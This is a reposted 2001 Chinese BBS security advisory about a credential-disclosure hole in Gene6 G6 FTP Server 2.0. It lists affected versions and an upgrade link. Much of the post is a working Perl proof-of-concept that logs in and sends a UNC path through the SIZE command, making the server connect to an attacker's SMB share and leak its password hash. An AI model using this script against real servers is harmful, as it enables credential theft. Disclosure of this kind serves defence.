荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: gcool (- 再一次单身 -), 信区: Newsoftware
标 题: Gene6 BPFTP FTP 服务器用户信任书泄漏漏洞 (转载)
发信站: 荔园晨风BBS站 (Wed Apr 11 17:52:30 2001), 转信
【 以下文字转载自 Hacker 讨论区 】
【 原文由 laofuzihere 所发表 】
(转自softhouse)
Gene6 BPFTP FTP 服务器用户信任书泄漏漏洞(2001-4-10)
名称: Gene6 BPFTP FTP Server User Credentials Disclosure Vulnerability
类型: 环境错误
发布日期: 2001-4-10
影响系统: Gene6 G6 FTP Server 2.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
不受影响: Gene6 BPFTP Server 2.10
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
描述: G6 FTP服务器是一个由Gene6开发的网络FTP服务器。其中存在一安全漏洞,如?
为了连接远程主机,用户必须提供登陆信任书,FTP服务器才能允许登陆运行,口令hash通?
测试程序:
#!/usr/bin/perl
# G6-2nbt.pl - example G6 ftp server netbios connection script
#
# Tested on win32 and Linux, Linux requires share name to be in
# the format: \\\\host\\share\\path or //host/share/path
use Getopt::Std;
use IO::Socket;
my($host,$login,$pass,$share,$CRLF,$result);
$CRLF = "\015\012";
getopts('h:l:p:s:',\%args);
if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host =
$args{h};}
if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share =
$args{s};}
if (!defined $args{l} || !defined $args{p}){($login,$pass) =
('anonymous','user@myhost.com');}
else { ($login,$pass) = ($args{l},$args{p});}
$our_sock =
IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21)||
die("Socket problems.");
print "Connected!\n";
print "Login...";
print $our_sock "USER $login" . $CRLF;
$result = <$our_sock>;
if ($result !~ /331\s/) { print "User name not accepted or an error
occurred...exiting.\n";close($our_sock);exit; }
print "good.\nPass....";
print $our_sock "PASS $pass" . $CRLF;
$result = <$our_sock>;
if ($result !~ /230\s/) { if ($result =~ /530\s/) { print "Login/password
incorrect exiting.\n";close($our_sock);exit; } else { print "Login
failure..exiting.\n";close($our_sock);exit; }}
print "good.\nTesting path type...";
print $our_sock "PWD" . $CRLF;
$result = <$our_sock>;
$result = <$our_sock>;
if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative
path' is enabled...exiting.\n";close($our_sock);exit;}
print "not relative path.\nSending UNC to connect to...";
print $our_sock "SIZE $share" . $CRLF;
print "completed.\nCheck your logs.\n";
close($our_sock);
exit;
解决方法: Gene6已经针对此漏洞开发了更新版本,下载地址
Gene6 G6 FTP Server 2.0:
Gene6 upgrade postdown
http://www.bpftpserver.com/postdown.html
--
※ 来源:·BBS 水木清华站 smth.org·[FROM: 162.105.90.55]
--
_______________________________________________________________
Please visit my FTP: 192.168.0.123
我用正版我自豪,我用盗版我骄傲!^_^
^o^ Gcool'sFTP://192.168.0.123^_^ TheMAT?
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.123]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店